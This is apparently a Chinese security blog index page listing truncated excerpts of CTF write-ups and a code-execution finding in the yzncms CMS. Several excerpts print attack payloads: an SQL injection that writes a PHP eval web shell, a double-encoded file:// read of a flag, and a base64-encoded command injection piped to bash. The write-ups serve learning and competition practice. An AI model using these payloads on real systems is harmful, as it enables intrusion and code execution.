mDMZ yzncms,之前沉迷挖cnvd的时候挖过这个cms,基于tp开发的,所以直接就往控制器里面看了,最后在collection/Node/parseFunction处找到了一个call_user_func_array,如图: 因为args是从varArray中取到的,按着tp的这种调用模式match跟content都是可控的,那么接下来就直接任意代码执行了: 然后就是执行命令:m...
mDMZ yzncms,之前沉迷挖cnvd的时候挖过这个cms,基于tp开发的,所以直接就往控制器里面看了,最后在...
阅读全文>>强网先锋就不写了,写写我做出来的三个解数比较多的题。 pop_master 题目内容:听说你是pop链构建大师? 16万行混淆代码: 其实这题一开始@gq已经做出来了,谁能想到靶机一开代码重新混淆了。。。 这题其实还挺有意思的(如果会写脚本的话),但是我跟一半了感觉差不多了,懒得写脚本只能继续跟,多少是有点费眼睛。 同时我感觉其他题没什么思路,于是从12点跟到15点跟出来一条链: ``...
强网先锋就不写了,写写我做出来的三个解数比较多的题。 pop_master 题目内容:听说你是pop链构建大师?...
阅读全文>>闲来无事把code-breaking2018刷了。 function ```php <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ''; if(preg_match('/^[a-z0-9_]*$/isD', $action)) { show_source(FILE); } else { $ac...
闲来无事把code-breaking2018刷了。 function ```php <?php $actio...
阅读全文>>签到 略过~ write_shell 代码审计: ```php <?php error_reporting(0); highlight_file(FILE); function check($input){ if(preg_match("/'| ||php|;|~|\^|\+|eval|{|}/i",$input)){ // if(preg_match("/'|...
签到 略过~ write_shell 代码审计: ```php <?php error_reporting(...
阅读全文>>NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文件,根据http://www.crystalradio.cn/thread-637028-1-1.html来反编译。 ```c _BYTE sub_8000314() { _BYTE v0; // r4 unsigned __int8 *v1; // r5 int v...
NodeMce 不清楚是否非预期,一个strings直接能看到flag STM stm32单片机,给了一个bin文...
阅读全文>>easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写绕过 password=a&username=-1' uNion sElect 1,'<?php eval($_POST[1]);?>' into outfile '/var/sercet/html/9.php'--+ hello_php www.zip源码...
easyci 注apache配置文件出来得到web路径为:/var/sercet/html/ 写shell,大小写...
阅读全文>>虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过 Payload: http://47.104.232.98:49725/?url=file:///fla%25%36%37 Hi_433MHz 导入au,短的是0,长的是1: 得到: 011001100 011011000 011000010 011001110 011110...
虽然题目质量不错。 //但是被注入恶心到的两天 签到 直接读flag读不到,读源码发现是curl,可以二次编码绕过...
阅读全文>>Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: 稍微加点空格什么的修修改改就行了,payload: ?url=|echo%09"Y2FcdCAvZXRjLy5maW5kZmxhZy8q"|base64%09-d|ba\s\h flaskbot 通过各种让他报错拿到一份大概的源码: 可以看到这里用了render_templ...
Command 签到题,过滤了如下: base64+%09绕一下过滤,因为匹配大小写,所以可能会出现这种情况: ...
阅读全文>>最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your resume on word is for rookies. Real programmers use yaml. ~~I hope I don't have any bugs~~ URL: https://resume-yml.appsecil.ctf.today/ By Meit...
最后的xss some攻击学到了(虽然比赛遇到也许还是不会 Resume.yml Writing your re...
阅读全文>>文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到这么两句sql语句: <!-- $query = "SELECT * FROM fake_flag WHERE id = $id limit 0,$limit"; //$query = "SELECT flag FROM real_flag WHERE id = $id ...
文章首发于:合天 web1 输入1点击输入框后会显示如下参数: ?id=1&limit=1 看下源码能得到...
阅读全文>>easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 BlackCat view-source:http://183.129.189.60:10022/Hei_Mao_Jing_Chang.mp3 拉到最底下有源码: ```php if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST...
easycon 简单题,连上马儿后发现目录下有个bbb的txt文件,解码base64后的图片就是flag了。 Bl...
阅读全文>>upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 Funhash ```php <?php include 'conn.php'; highlight_file("index.php"); //level 1 if ($_GET["hash1"] != hash("md4", $_GET["hash1"])) { ...
upload wireshark导出对象后会有一个图片,根据文件名知道是steghide隐写,密码123456。 ...
阅读全文>>
_ _ _ _ ___ ___
| | | | | | | | \/ |
| |_| | |__ | |__ | . . |
| _ | '_ \| '_ \| |\/| |
| | | | | | | | | | | | |
\_| |_/_| |_|_| |_\_| |_/